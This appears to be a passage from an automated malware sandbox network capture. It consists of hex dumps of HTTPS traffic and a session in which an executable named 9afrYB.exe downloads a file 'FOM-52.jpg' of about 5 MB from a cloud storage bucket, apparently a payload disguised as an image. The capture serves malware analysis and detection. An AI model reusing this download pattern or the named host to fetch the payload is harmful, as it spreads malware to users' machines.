                                                                                2025-01-10 01:27:22 UTC4096INData Raw: 42 cc 3b 8b 04 80 dc 85 89 f7 db 86 4b ce 35 a8 af fe 41 fa 0c 61 84 11 0a 1b 74 3d 42 1d 8b ea 87 f2 e5 bc 47 e4 9b f0 a1 6a 44 3d f7 aa 85 fc 7c 66 99 44 42 66 08 55 a3 c2 72 d1 08 6f b1 b4 88 fb 14 6d f7 a2 e6 b1 0a 4b a7 cc 8d 43 ca 42 55 ba 2d 50 3b de 75 e4 69 e5 a6 45 fe 3f 88 51 f2 8f 9a e2 49 ea ad 5a da 33 4e a3 3e d5 c6 6e c7 d1 e8 c5 06 f1 38 15 6c 30 51 e9 b2 ec bd f6 b7 43 20 6c 37 8a c5 69 36 0c 71 9e eb 37 4c 5e 64 2d ba 15 c3 be 23 92 69 e8 07 8e 31 8e 32 59 a6 f5 54 50 cc a6 0d cb 70 1b 9f a8 37 28 8e 8c a8 b6 58 2d d6 5f 3e e5 51 37 e9 fc c0 79 61 49 dc 37 0b d7 f9 38 30 21 a3 63 4a 50 26 80 0f ad 3c d1 89 c4 d8 15 09 d3 5c 40 7c a4 b7 fe fc 2d 89 04 24 ad d9 e2 58 57 f8 d2 39 21 f1 85 1f 5d ae 5b 62 f2 2d 86 49 5e 70 f6 14 48 c1 63 66
                                                                                Data Ascii: B;K5Aat=BGjD=|fDBfUromKCBU-P;uiE?QIZ3N>n8l0QC l7i6q7L^d-#i12YTPp7(X-_>Q7yaI780!cJP&<\@|-$XW9!][b-I^pHcf
                                                                                2025-01-10 01:27:22 UTC4096INData Raw: 55 c7 be c5 78 ee 64 cd 2e 33 d8 00 81 41 01 fc 96 f3 c2 68 5b e3 86 3a 52 14 eb 36 47 9c d8 8b 1b 75 f9 f2 3e 9e 6a 5c af ac 2d 01 59 f6 e4 ed f8 06 96 96 25 32 d9 55 c2 2b cd d9 43 84 c0 8f da 8a 2e 4e 40 af e4 ef 68 35 b1 db 47 6c 13 6a 58 3b 70 ee a1 fc f0 ea cf 6e ad 25 29 22 ee a3 88 45 8b c6 2a 08 f5 8e fe d9 90 64 31 57 f5 7b 69 f4 88 ee 13 ee 88 13 dd fe 62 86 d5 85 88 9b aa 98 eb ae 62 7e dd 59 12 19 69 99 a8 6c 0d 6f 92 a5 a3 77 6e d0 53 bb 17 f4 5f d6 e6 1f 4a cf 6d f7 92 79 05 8e d4 33 04 97 04 b6 95 73 06 7a e5 99 05 66 48 93 78 17 26 6e e6 6b 89 ba b3 4a 9a d7 ee e1 45 2d c4 d9 46 38 58 a3 e7 df cb c0 a8 8b 48 54 ab ab c9 2b 10 28 f1 1f 7e 00 6d 13 0b 8f 10 81 c8 3f 99 d0 f4 09 6e a8 37 1d 0d 72 39 87 d5 f2 12 b6 cb fa 95 c3 25 72 27 66 14
                                                                                Data Ascii: Uxd.3Ah[:R6Gu>j\-Y%2U+C.N@h5GljX;pn%)"E*d1W{ibb~YilownS_Jmy3szfHx&nkJE-F8XHT+(~m?n7r9%r'f
                                                                                2025-01-10 01:27:22 UTC4096INData Raw: 45 e5 5e 68 30 58 bc f3 3c 4c f2 55 29 ac 64 46 5d 3a 9d 79 a5 77 53 ff 44 c3 e1 4a bd ab 8a bd d4 75 ea e1 2a ee 82 37 b9 6b 8b 4d 69 c9 72 b7 c8 66 c5 06 1b db fb d1 44 d1 f5 36 5b 9f 70 43 e3 b9 cc 9d 24 02 a0 15 1a ee 33 51 a6 de 11 4b 6e 87 8e 08 53 81 c7 39 1d bd 06 98 20 7a 9b 47 b4 aa c5 34 08 11 e2 e2 77 2e 0a 28 8a 33 9b 65 f3 3a 67 17 4e 17 e5 d0 55 59 0e 94 52 4b da e3 d0 7a 25 77 a6 34 0e aa 88 bd f9 1f a8 08 f8 42 83 d2 79 43 2f 04 cc aa cd fb df 7b c0 14 58 c6 51 a2 5e 37 42 12 e5 22 53 12 9f 78 be b5 39 59 c1 b2 1b 55 3b d8 b9 8f e2 36 93 6c 44 d2 80 9d 04 d2 7c 54 bb a2 23 a2 95 da 63 2d 43 a0 da 70 ab 87 c5 6b ef 95 b1 2a bd 9b 5e 30 06 ef 83 ea 01 6e 63 4c 04 68 89 7a 93 34 80 33 0b 68 86 5c 60 2f 6b 05 3f d6 5f 19 77 94 92 45 e3 e4 5c
                                                                                Data Ascii: E^h0X<LU)dF]:ywSDJu*7kMirfD6[pC$3QKnS9 zG4w.(3e:gNUYRKz%w4ByC/{XQ^7B"Sx9YU;6lD|T#c-Cpk*^0ncLhz43h\`/k?_wE\
                                                                                2025-01-10 01:27:22 UTC4096INData Raw: c3 8f ae 6b a3 4e 8c 8c 89 8a 8b bb 66 fa 15 1c 40 d7 45 6a 0d 3c 0a ea 62 81 9f 9c 9d 9e b3 ea 13 ac cb d0 8f f2 eb dc 40 32 33 15 5f dc 2b 1c db c0 69 be 0d f5 9a fc b0 a5 8c 0d 14 ff 63 f5 b9 a4 8d b4 ad be 22 34 78 e5 cc 65 24 7e f7 de d1 9a 58 cb 99 5d 98 d0 31 c2 08 cf dd 57 4b b4 a1 1c 1c 1b b7 d4 3e 65 a5 e6 e3 12 2f 65 7b e1 ee 0d 0c 0b fa 6d b3 dc fd 3b 87 d8 fc 7c 7e dd 05 02 03 04 6d 3f 57 b6 57 83 5f 29 0d 83 6b 34 1d fb 27 35 0f 16 ff 3b 16 00 1b 13 18 f6 b1 66 21 22 45 ad 33 ab 43 0c 2d c3 cf b7 0c 2e 49 3f 87 34 b9 62 37 5e 2b 2f 1b 64 ba fa 3f 3e 3f 40 43 80 25 cd 43 cb 23 6c 4d a3 0c bf 51 4e c4 67 da 15 57 3c e4 e7 7f b8 99 36 7f 5e 9c 51 d2 37 d9 7b 63 80 ac 75 5b 79 44 1a 33 ad 95 60 78 00 1d 23 18 b0 aa 39 1f 25 1a a3 fc d2 ed 9d d9
                                                                                Data Ascii: kNf@Ej<b@23_+ic"4xe$~X]1WK>e/e{m;|~m?WW_)k4'5;f!"E3C-.I?4b7^+/d?>?@C%C#lMQNgW<6^Q7{cu[yD3`x#9%
                                                                                2025-01-10 01:27:22 UTC4096INData Raw: 2c 4d a6 a0 20 85 bf 62 23 7d 82 17 a5 30 de 99 08 fd bd 71 3f 39 61 73 43 04 d3 d0 32 6b df ec 1f f3 aa 3d 7b 0a ac d4 c6 23 eb ed fa 6d 34 b5 ed 0c e2 bd 2c ed e9 83 bc 4d 87 be 3e 5f 02 ba 42 ba da 19 39 86 8b 76 98 c3 52 60 65 25 e5 a0 40 e2 e2 87 c6 57 a0 12 c5 86 50 1e d8 82 61 b1 e8 7b 70 85 f2 3b b7 dd 68 1e f0 82 30 32 37 c7 33 54 06 4a a4 ff 6e be 09 90 75 b8 64 7a 3e 21 db ce 6f 5c 64 44 b9 59 00 93 ff 91 7d e8 f9 20 94 90 60 c8 6f 44 97 f9 8e b9 3f 4e a3 4f 16 b9 47 f2 81 03 6a 69 e2 21 55 c2 e5 97 52 04 26 ef ae c8 f0 44 77 88 66 31 a0 58 9d 00 de 3e a6 b9 c8 84 84 87 db 90 d9 4b f7 1b 42 d5 22 bd 5d b8 39 1d f5 0a 38 c0 d7 f6 11 bc a9 e2 0c 57 c6 d6 d2 a9 8d 6a 24 3b 74 4e 4b d1 a2 f8 51 7c c5 b8 66 61 13 6e 3f 61 be 64 71 7e 98 bf 08 7c a7
                                                                                Data Ascii: ,M b#}0q?9asC2k={#m4,M>_B9vR`e%@WPa{p;h0273TJnudz>!o\dDY} `oD?NOGji!UR&Dwf1X>KB"]98Wj$;tNKQ|fan?adq~|
                                                                                2025-01-10 01:27:22 UTC4096INData Raw: 94 13 4b ba 59 94 28 79 a8 e0 04 9d d9 34 71 d1 8c 52 64 54 a0 2b 3c 9c 31 d6 31 5f dd b0 e1 72 5d e3 d3 0b c9 a4 8c fb 2c 74 4a 06 21 9f e8 77 ac 0e 7a 81 04 97 79 d9 a7 dd 40 e7 17 4f ab a4 75 32 04 32 e1 14 a8 64 5f 11 ea c6 56 50 d4 0e a9 a2 60 f3 93 c9 f3 5b a6 1a 47 9d 93 21 ea 45 f3 4d b6 6f fb a9 28 33 1d 5a 7f 16 47 e8 cf ef 81 45 43 18 41 ba 88 08 34 0b 76 70 e2 cb ca 69 b2 1e ec 31 ce 87 99 c8 ea 75 26 3c 60 26 76 99 85 6f 63 0e 0a a5 9a c7 af 0b ca ae 36 08 d2 74 3d 9c 9f c4 1f ad bf b0 84 3c 40 df 89 dd 19 5a d3 d7 79 ab d7 2e 2a a0 76 2f e6 75 8b 65 39 ad 89 15 b0 7f fa 18 c5 c7 ac b2 d7 44 6c f2 c9 cc af e9 40 b3 57 30 a5 f3 1f f5 06 cf 73 14 18 f9 0d 72 f7 19 79 98 57 e5 11 81 1a 41 9d 8f a7 7d ea 03 5c 14 65 f8 a6 73 dd d4 70 b3 48 cb 66
                                                                                Data Ascii: KY(y4qRdT+<11_r],tJ!wzy@Ou22d_VP`[G!EMo(3ZGECA4vpi1u&<`&voc6t=<@Zy.*v/ue9Dl@W0sryWA}\espHf
                                                                                2025-01-10 01:27:22 UTC4096INData Raw: 7e 30 df f0 37 2c a5 37 4f 4c e2 13 7c d1 f8 91 c5 fa be cf 9e 00 28 6a dd ff a3 dc ca c7 5f af 65 39 20 43 0f 76 27 75 a7 a8 f1 fa 94 9f e4 b0 f7 a8 82 87 3b 0a 53 b7 20 93 c5 42 21 59 4a 44 cf 6d 00 01 ce a2 49 10 81 c0 c4 c2 ee b6 e5 6b df 46 07 d3 21 07 58 b3 27 fb fe f2 08 3e bc 0d 03 78 9c 6a b4 0f 93 15 14 83 ae 77 c8 e3 dc db 3a e9 9b 9d 1c c6 8a 7b 52 97 8e 19 85 b7 fb c2 a6 6b fd 94 63 78 f1 63 13 10 63 6f 18 d5 92 b6 d1 b7 a2 84 9b d4 90 d9 84 fc ef a5 a6 c5 ba b6 64 c7 fe d4 d4 23 c0 71 8e e4 e7 87 ee e0 7b 41 ab 03 0e d0 58 f4 61 98 ac 8a bc 7f 9b 4c 5a 39 6c 26 9a c8 d3 6c b4 71 fa 5a e7 33 7a 60 25 a6 5a 83 a7 05 e0 89 ab f3 71 7b 1f 34 10 5a c9 8f 29 a8 53 58 fe 56 32 96 b8 9e 3a d9 ee 0c 60 09 71 b5 2b 70 55 a8 b7 e2 8b 6b 95 ad 89 2f ca
                                                                                Data Ascii: ~07,7OL|(j_e9 Cv'u;S B!YJDmIkF!X'>xjw:{Rkcxccod#q{AXaLZ9l&lqZ3z`%Zq{4Z)SXV2:`q+pUk/
                                                                                2025-01-10 01:27:22 UTC4096INData Raw: e7 04 8e cb 30 d6 37 73 19 58 f3 d5 05 6a d7 87 a6 a4 b9 8e a3 5d cc d5 8b 34 ca e2 6a a0 78 0e e3 7b 1c 29 5a a6 5b 55 62 f1 e6 be 23 a0 43 ad e5 d7 92 f7 b3 96 4f 03 54 71 e0 f1 af 06 a6 f0 00 d1 7e 0a b5 f4 09 e0 28 9e fb 47 84 32 32 1b 8a 9f c1 2e bc e2 8e a0 2e ff 90 dd 7e c7 83 94 f3 d0 5a 05 5e 0b 2c b3 a4 f8 4a e7 0f 49 f6 3d ff 18 c0 83 1f 5d f8 00 bd db 23 65 28 8b 33 a9 4d 2b 81 26 66 9c dc 18 b6 96 f5 c0 bf 49 34 bb da 49 5e 06 d6 0f 1c e9 ba c4 8c 4c bb 0d 49 a4 6a fd d0 ef 7e 6b 35 34 10 92 02 52 67 16 58 07 e6 47 e0 dc bb dc 14 5e a1 d9 f0 67 70 2c ed fa 8f ca 33 6f ad 4f 2b e0 78 1e f0 18 a4 c5 e4 02 81 a3 0f 9f 0e 1b 45 92 27 fc 39 cc be 57 c0 4c f8 c9 c4 77 47 d4 ac 33 24 78 3d f0 d1 e4 b8 d2 ce 88 69 21 65 3a 2c 1f 95 b1 20 31 6f 2a 06
                                                                                Data Ascii: 07sXj]4jx{)Z[Ub#COTq~(G22..~Z^,JI=]#e(3M+&fI4I^LIj~k54RgXG^gp,3oO+xE'9WLwG3$x=i!e:, 1o*
                                                                                2025-01-10 01:27:22 UTC4096INData Raw: be d0 2a 4c 19 64 3b ba 0e 94 4e 20 15 9f c2 86 3a 4f 85 f3 ee 58 cd 35 91 2f 10 20 88 da 3e c0 05 f8 22 66 79 44 a0 a8 56 48 12 18 4c 26 67 bf 07 bd 0e 8a 4f b7 62 4f 64 7b 46 88 30 02 d0 63 3b 3d 3c 2c 8c 51 e6 c8 ad 43 c5 a4 f1 40 de 99 5c b6 f7 dc 3c 7d 03 cf d9 bc 50 d4 5c 1b dd e0 e1 e2 85 6d a9 c3 e7 80 7d cd 51 5d 8b 19 fb d4 7c 96 d7 f0 1c 7d 23 ef f9 3d bf d8 fd 3e b9 23 40 ea b3 f0 27 06 c6 ea 0b 81 ce 0f cf e6 d6 16 19 12 9a 03 7d 2b 37 16 c5 97 7f 38 15 f7 a1 1d 02 22 4b 1f a3 92 9d c1 35 82 21 2c 90 85 a7 9e 04 28 f5 b1 d9 e8 96 b1 29 17 fc ee 8c bf c7 80 28 0e ea b1 fb 7e 34 d7 f3 21 35 2f 26 43 09 73 42 b5 c9 ae 73 45 1e 38 5f c7 ea 8b e0 a7 ba f0 52 79 4f c7 e5 a4 8b dd 4b 28 03 3d a1 25 9f ac b6 97 e3 25 09 20 15 2d d1 f6 c6 3d 63 88 5a
                                                                                Data Ascii: *Ld;N :OX5/ >"fyDVHL&gObOd{F0c;=<,QC@\<}P\m}Q]|}#=>#@'}+78"K5!,()(~4!5/&CsBsE8_RyOK(=%% -=cZ


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                11192.168.2.549986118.178.60.94436764C:\Users\user\Documents\9afrYB.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2025-01-10 01:27:32 UTC115OUTGET /FOM-52.jpg HTTP/1.1
                                                                                User-Agent: GetData
                                                                                Host: 22mm.oss-cn-hangzhou.aliyuncs.com
                                                                                Cache-Control: no-cache
                                                                                2025-01-10 01:27:32 UTC546INHTTP/1.1 200 OK
                                                                                Server: AliyunOSS
                                                                                Date: Fri, 10 Jan 2025 01:27:32 GMT
                                                                                Content-Type: image/jpeg
                                                                                Content-Length: 5062442
                                                                                Connection: close
                                                                                x-oss-request-id: 678077846E537B37330BF6CB
                                                                                Accept-Ranges: bytes
                                                                                ETag: "70C21DA900796B279A09040B00953E40"
                                                                                Last-Modified: Mon, 18 Nov 2024 15:32:22 GMT
                                                                                x-oss-object-type: Normal
                                                                                x-oss-hash-crc64ecma: 360383310743409046
                                                                                x-oss-storage-class: Standard
                                                                                x-oss-ec: 0048-00000105
                                                                                Content-Disposition: attachment
                                                                                x-oss-force-download: true
                                                                                Content-MD5: cMIdqQB5ayeaCQQLAJU+QA==
                                                                                x-oss-server-time: 3
                                                                                2025-01-10 01:27:32 UTC3550INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10
                                                                                Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
                                                                                2025-01-10 01:27:32 UTC4096INData Raw: 3b 9a 2f a5 d0 56 ab c4 f4 cc a1 12 27 f0 11 4c 94 ef 12 31 58 23 3c c6 b1 ec ba 45 96 46 46 f6 24 8e 89 dd b1 38 89 66 c2 79 d2 b3 b5 25 19 80 c7 28 f9 85 7d 8d 49 94 e3 d2 8b 92 cb f1 27 a5 1e 65 9a 0d 24 21 88 82 f8 05 e3 7e 27 2d b8 d1 e3 32 71 8d ad 95 6c 46 1c 3b d8 e9 eb 13 24 94 d8 16 f1 f4 38 83 ee f5 d4 be 1d b9 53 fa 70 d4 ee cc a4 15 79 67 9f 06 cb 07 19 b1 3e 7c b5 65 18 68 0a c6 22 13 ed 4c ea 2c ff 32 4f 94 a2 b5 94 ef ee d9 86 62 ff a7 83 cf f0 ea c9 44 53 4d 8a 6c 9b cc 06 f2 e6 13 fa 3c 21 8d f7 9f 32 cd 95 50 9a 71 01 f0 c6 0b dd 04 f0 5b 24 6b c6 6c 7f 35 67 68 4a 5b 2d df 32 af ed a0 7b 95 d7 43 07 d1 fb 17 0b 43 df 87 62 69 46 68 e0 eb 47 28 a3 81 aa 32 08 bc 21 f8 7a 14 93 1b c6 2c 1b 7d c3 10 5b d1 12 f7 56 c2 1c 7c e4 85 f3 c4 6f
                                                                                Data Ascii: ;/V'L1X#<EFF$8fy%(}I'e$!~'-2qlF;$8Spyg>|eh"L,2ObDSMl<!2Pq[$kl5ghJ[-2{CCbiFhG(2!z,}[V|o
                                                                                2025-01-10 01:27:32 UTC4096INData Raw: a8 c4 d9 fd a7 56 28 73 5f 0f 7f 3b 00 66 82 36 d4 2f 7b 1c 50 0d 90 42 5e 0e b6 3d dc 83 58 6a 35 e0 f2 6f 3a a8 d5 ee 37 cd 99 ee 9c 06 8c d0 87 05 97 4d 50 36 97 03 25 ea e1 52 3c bb 3e 25 ca 4d a1 9a de 65 27 6e 38 2d 65 92 e5 96 84 ff 4a 69 e4 8b 0a 8b 94 f6 d4 7c 01 80 fb e0 03 ea 19 32 5d 29 28 3c ad 5d b5 fc 74 7f 9a bf fa 5f aa b3 08 b5 0d 57 25 c0 b8 67 cb 8c bc e8 48 4a 02 a5 57 78 65 40 ad c1 5a 91 f1 85 ed 06 07 63 d1 27 0a 48 fc b3 b0 df 6f a6 ee 6a 10 26 82 2e 2b 90 38 ca 76 a6 a6 73 fc a4 31 18 8b bd 07 98 fc 6b e9 ca cc 83 78 6a 94 92 3f 5d 02 57 0e 0c a9 36 a3 64 c6 b8 98 a5 03 28 be 9c a1 91 80 1b b7 e8 6f 73 1a dc 78 f5 54 c0 09 e3 53 1a 57 f1 88 1f f9 f7 41 dd c4 eb 74 19 ad 09 5d 4b c5 25 7f a9 10 ba 2e 1a 5c 79 23 15 00 2d cb 6f 11
                                                                                Data Ascii: V(s_;f6/{PB^=Xj5o:7MP6%R<>%Me'n8-eJi|2])(<]t_W%gHJWxe@Zc'Hoj&.+8vs1kxj?]W6d(osxTSWAt]K%.\y#-o
                                                                                2025-01-10 01:27:32 UTC4096INData Raw: f5 f3 fb ff fd f3 f5 f7 f5 f3 eb ef ed d3 d5 d7 d5 d3 dd bf a7 d3 d5 d3 d5 d3 2d 2f 2d 33 37 37 75 32 3d 3f 2d 33 35 27 35 33 2d 2f 3d 53 55 47 55 53 5d 5f 5d 53 45 57 55 53 11 b2 50 73 3f 77 75 73 f1 8d 4d 73 a9 77 75 73 6d 3f 17 53 b5 56 55 53 5d 5f 5d 53 55 57 55 53 2d 2f 2d 33 35 37 35 33 3d 0f 47 33 15 2c 35 33 2d 2f 2d d3 d5 d7 d5 d3 dd df dd d3 d5 d7 d5 d3 ed ef ed f3 f5 f7 f5 f3 fd ff fd f3 f5 f7 f5 f3 4d c9 97 d3 95 d7 d5 d3 dd df dd d3 d5 d7 d5 d3 2d 1f 00 33 51 37 35 33 3d 3f 3d 33 35 37 35 33 2d 2f 2d 53 55 57 55 53 5d 5f 5d 53 55 57 55 53 43 1b 08 0b 01 77 75 73 1e cd 7c 73 75 67 75 73 6d 6f 6d 53 55 57 55 53 5d 5f 5d 53 55 57 55 53 2d 2f 2d 33 15 37 35 53 13 4d 59 52 41 56 35 33 e5 a6 2d d3 d5 07 d4 d3 dd df dd d3 d5 d7 d5 d3 ed ef ed f3 f5
                                                                                Data Ascii: -/-377u2=?-35'53-/=SUGUS]_]SEWUSPs?wusMswusm?SVUS]_]SUWUS-/-35753=G3,53-/-M-3Q753=?=35753-/-SUWUS]_]SUWUSCwus|sugusmomSUWUS]_]SUWUS-/-375SMYRAV53-
                                                                                2025-01-10 01:27:32 UTC4096INData Raw: 7d e2 3a fb d9 7f 2d 5c 08 7e 89 cb e9 3a 78 19 d3 d3 54 a8 dd 3b c0 68 9c d3 da f6 a0 3f b8 09 85 13 9c b2 89 02 f5 bb 84 84 22 99 a1 5c eb db e4 e4 52 d7 a8 84 57 57 3d d3 53 dd 2c 15 fe 48 f8 17 59 7b 94 02 a5 74 75 f2 ab 6b 6d 53 55 5c 97 a4 8d b7 85 fd 1e 57 33 82 c4 fc f5 5b b3 98 02 7d b4 7b 18 33 b8 53 11 3f c4 e7 e4 99 d5 df 7a 12 6b f1 4b ab 5b 8f 5c 2e 0b c5 75 fb 0d d3 04 7a 6d a5 1d 7f b1 af 41 46 fd 97 72 44 70 9c 6c f0 98 c6 38 c7 3a 4f 9d 67 53 5d 8b 18 45 fa 27 78 f9 2c e7 bf e3 1a 15 03 e6 d9 54 24 d6 03 bf c8 c3 24 e4 ff 0d e1 62 93 bb 32 d3 1d e0 a9 69 56 22 dc 79 04 9f f6 79 91 f4 ce a4 27 3e 2c 7c 5a 6b f3 21 34 52 4f 12 6e 97 99 0b 32 20 48 ad 50 69 a7 06 6a 8b 46 53 7e 44 e7 8d 63 9d 43 d3 36 f2 39 ef 4b 76 db 20 c3 a9 cd f4 6d f2
                                                                                Data Ascii: }:-\~:xT;h?"\RWW=S,HY{tukmSU\W3[}{3S?zkK[\.uzmAFrDpl8:OgS]E'x,T$$b2iV"yy'>,|Zk!4ROn2 HPijFS~DcC69Kv m
                                                                                2025-01-10 01:27:32 UTC4096INData Raw: f2 f3 f2 cb a8 4e 59 1d d2 ce 66 43 81 7b ff 67 50 14 99 fb dd 4e 2d 27 1b 3b 32 e1 3d 33 3a 03 dd 71 52 2f 3d b3 f7 09 f2 37 09 35 05 d2 00 d7 a7 6e a2 5b 79 ad 9f 96 b5 c6 ed 9d 66 b3 39 53 74 34 ad bd bc 93 b3 fe 71 77 93 a5 84 18 86 55 55 ba d3 80 5c 53 d8 33 71 4b ee a2 49 17 31 de 70 f5 2e 3f d4 1a 6a 27 35 da f8 c9 29 d3 3d 14 a5 d5 dd 18 d9 f7 74 d2 59 bd 8b 6e 18 e6 02 30 b1 d7 f9 6b fa e2 61 91 0a 36 8b dc 30 3b 0f bb de d3 87 8c 44 53 a3 22 0d aa a3 e3 13 d4 68 4b 97 1e 19 a2 5f ef 4f 5c 9c 5f 83 e2 ed 0e 6b 27 d3 18 e0 1f 57 f6 99 4e 8f 66 e4 e9 d6 c4 39 a5 10 98 95 71 d9 7b bc 71 9c 9c 89 c1 9c 58 3a b4 2b 66 f8 3c 84 df 79 ba 43 96 ad af 4f c6 9e 70 72 72 50 0a 98 50 ac 17 9d c0 f8 94 89 96 25 87 df 01 09 25 05 6d 3f 30 e0 76 8e 06 07 6c ab
                                                                                Data Ascii: NYfC{gPN-';2=3:qR/=75n[yf9St4qwUU\S3qKI1p.?j'5)=tYn0ka60;DS"hK_O\_k'WNf9q{qX:+f<yCOprrPP%%m?0vl
                                                                                2025-01-10 01:27:32 UTC4096INData Raw: fb 64 56 1a 91 6e df 20 2c 89 77 e2 e2 05 39 f2 8e f5 00 2d 52 de 02 01 04 ca 1a ce 6a d2 47 a1 f6 d0 fe 59 5f 7b be ab de 7e b5 7b 3a bc 5c 60 b4 14 c4 40 8e 4f 1b d3 50 30 ca 88 05 19 87 a6 6c 44 9c 38 ec 39 0e 59 7b 02 e0 f1 72 5e f5 ad 67 1a cd 99 59 ab ba 5e 62 b2 6a a6 96 6c 3f b0 7f 47 31 af f9 8d b1 e6 2c 04 cc 68 ac 20 ea 27 da fc 3a c9 29 c2 2d 03 bc 6d b2 50 da 12 b2 4e b6 81 da 21 4d f8 86 bb 30 9c c3 3a 42 00 c7 75 98 22 d5 e2 ed f7 ca c4 d5 09 a4 4e 82 04 d4 70 9c 5e b4 e3 6c a8 46 17 b5 25 7a 7b b5 5c 61 52 62 b2 1a fe 80 42 8b a0 8b af 69 84 9a 79 9f 8b 45 e0 9d 05 e1 0c 2d e5 1f 50 b8 e2 04 38 e7 df 32 37 b0 48 b1 af 82 c3 27 a8 d2 aa e1 62 df e9 b2 a2 12 f5 be 96 d6 5d 5d 4d 27 3a 1a 32 92 06 ad 9a 5b a6 db 14 ee 80 13 e1 a7 67 c5 71 25
                                                                                Data Ascii: dVn ,w9-RjGY_{~{:\`@OP0lD89Y{r^gY^bjl?G1,h ':)-mPN!M0:Bu"Np^lF%z{\aRbBiyE-P827H'b]]M':2[gq%
                                                                                2025-01-10 01:27:32 UTC4096INData Raw: ac 16 c6 07 c4 9d 58 cd bb f4 f0 2b 3a 16 5a da 8a 33 81 27 42 b4 e4 1c b3 44 f3 eb 30 85 ed 13 a0 b4 46 35 68 06 83 59 2b bf 9b 83 03 97 31 12 15 bc 78 b1 76 b9 71 21 32 04 6b 81 a4 83 32 6f d6 69 98 27 df ea f9 0c 4f 4b 67 2f 4b 06 67 44 04 ef 78 60 0a 1a 43 f5 40 32 c2 0d 65 17 e5 08 cc a8 23 c1 d9 dd 70 6e 88 fc 7f 8d 81 6d 3c 8a c0 7c 8f 3d 55 13 79 ca fa 4f 7d 9f 59 1f ab 7a 58 3c b6 7e 0a 9f 2b 23 7e 6a 96 9f 38 e0 63 e5 5a 1a 32 5b b4 2a 2e c8 4b fc 30 60 d4 a2 2b 2b bb 40 ab 29 c3 47 5a c5 72 2a 67 22 60 fd 3a 2c 8c 49 94 ad 10 8c f4 1c aa 13 b2 44 63 6e 0d 2e 1c 0e 75 75 75 69 83 57 e4 6c 56 e5 7f 18 20 b8 d1 37 88 2a 1b 65 fe 57 b8 31 b5 b2 3c d8 01 d7 18 1c 20 44 7d d7 1c 11 ca 50 b1 34 77 e7 17 39 01 6f c0 e8 d3 94 88 53 e8 54 bc 80 c3 59 3a
                                                                                Data Ascii: X+:Z3'BD0F5hY+1xvq!2k2oi'OKg/KgDx`C@2e#pnm<|=UyO}YzX<~+#~j8cZ2[*.K0`++@)GZr*g"`:,IDcn.uuuiWlV 7*eW1< D}P4w9oSTY:
                                                                                2025-01-10 01:27:32 UTC4096INData Raw: cc 4c d0 d3 09 06 21 8c 0a e4 fd 58 ee 29 db 81 82 6d c1 a4 30 bc c1 88 36 cd ab 62 b5 32 ab fb fb ec 20 e3 1f be d1 52 c7 7b bf 58 54 f3 43 f2 8d 0e 8b f7 13 10 a0 bb 4f ee a1 7a 27 8f 37 90 b6 93 e7 12 94 df b3 75 98 ed 5e 3f 26 b3 6b dc e4 4b ac 06 65 59 29 76 21 46 e6 59 50 ec 8d 23 41 76 61 bd b4 2a c0 a1 d0 00 7d 85 b9 46 a9 73 14 b0 38 5b 50 8e c5 4d 41 4e b1 33 ec 52 c8 9b 60 d6 75 f5 94 ee 23 f4 6f f6 e6 d2 e9 4d 56 be d7 e4 8f 26 6e aa 79 e5 e6 5e 13 6c 17 b6 e2 e2 11 f5 fe 7e 0b 44 9b c6 aa 3a f9 70 8c 7b bc 07 41 a6 db 37 9c 40 ed 30 d4 63 08 f2 34 c3 bc 19 00 1b 0e a0 05 0a d9 18 ea e0 fd 6c 8a 5d c5 2d 44 59 87 c8 6a f8 9f 94 42 5d b7 0d 78 f1 3b 58 f0 58 03 2c 94 05 87 6d 14 59 c3 c8 52 68 6d 20 54 3c df df dd d3 b3 5e da 3a d6 ef ef f3 4d
                                                                                Data Ascii: L!X)m06b2 R{XTCOz'7u^?&kKeY)v!FYP#Ava*}Fs8[PMAN3R`u#oMV&ny^l~D:p{A7@0c4l]-DYjB]x;XX,mYRhm T<^:M
                                                                                2025-01-10 01:27:32 UTC4096INData Raw: 03 58 89 56 b4 b6 a2 ad 03 9c f1 67 d1 75 f3 e8 19 38 39 86 89 50 71 f6 9c 55 6e f0 3c 79 b6 4b a6 36 b9 b4 a2 ab 24 ae 39 77 96 dd 86 d0 fd 7d 97 cb 0d f0 c5 e3 02 f9 c1 52 24 d9 92 d5 0f ce ba 02 8d 60 9d a4 7e 46 0c f6 07 7e 6e 99 9f b7 49 61 ff 7c c2 1d c4 45 e2 10 ab 9d 5d f3 48 c7 32 f2 49 bd 7e 2c f3 14 b8 55 84 3b b6 cd f2 2c a2 4e c8 2f 6a 5f 90 af 64 33 93 34 22 de 67 0c 00 0a 07 58 6d 1d 91 a5 e8 77 57 3e 92 ad 64 db 25 db 5a a7 9e fb ee 37 1e bf 9f 1c 20 8f 58 83 8e 9c 9d 1a 84 f4 2f e8 b6 e9 fc 5c 14 cf 3d a8 20 c1 36 73 8b 6d ad fa 19 32 a5 19 e7 34 c8 51 2a b2 c7 6f 71 16 6b 1a c9 12 87 4a 5b 13 27 7e 0c 5d 42 3e 1f df 6d a6 94 82 5a 53 5e fd 07 49 a4 e3 fa f2 49 de ae 8b 50 62 d9 cf c2 ba 82 06 00 8f 34 6e 19 e8 d9 e4 90 5c e0 85 6f a3 ed
